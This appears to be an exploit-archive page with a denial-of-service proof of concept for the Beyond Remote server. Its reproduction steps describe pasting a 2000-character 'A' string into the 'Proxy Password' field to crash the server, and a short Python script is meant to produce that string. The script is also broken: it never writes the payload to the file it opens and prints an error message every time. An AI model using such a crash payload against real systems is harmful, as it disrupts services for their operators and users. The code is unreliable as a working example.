Beyond Remote Denial Of Service

Beyond Remote version denial of service proof of concept exploit.

MD5 | f257a1ab99b324ce0cc42d5bb0648107

# Exploit Title: Beyond Remote - Denial of Service (PoC)
# Author: Erenay Gencay
# Discovey Date: 2018-09-24
# Vendor notified : 2018-09-24
# Software Link:
# Tested Version:
# Tested on OS: Windows XP Professional sp3 (ENG)

# Steps to Reproduce: Run the python exploit script, it will create a new file
# file with the name "mre.txt". Copy the content of the new file "mre.txt".
# Start Beyond Remote Server and click "Configure" than click "Update Options" than
# click "Proxy Settings" Paste the content into field "Proxy Password" click "OK"
# It will cause the DOS situation.

bof = "A" * 2000


print("payload is loading..")

dosya = open('mre.txt','w')
print(" [+] File Created")

print("Someting went wrong !")

Related Posts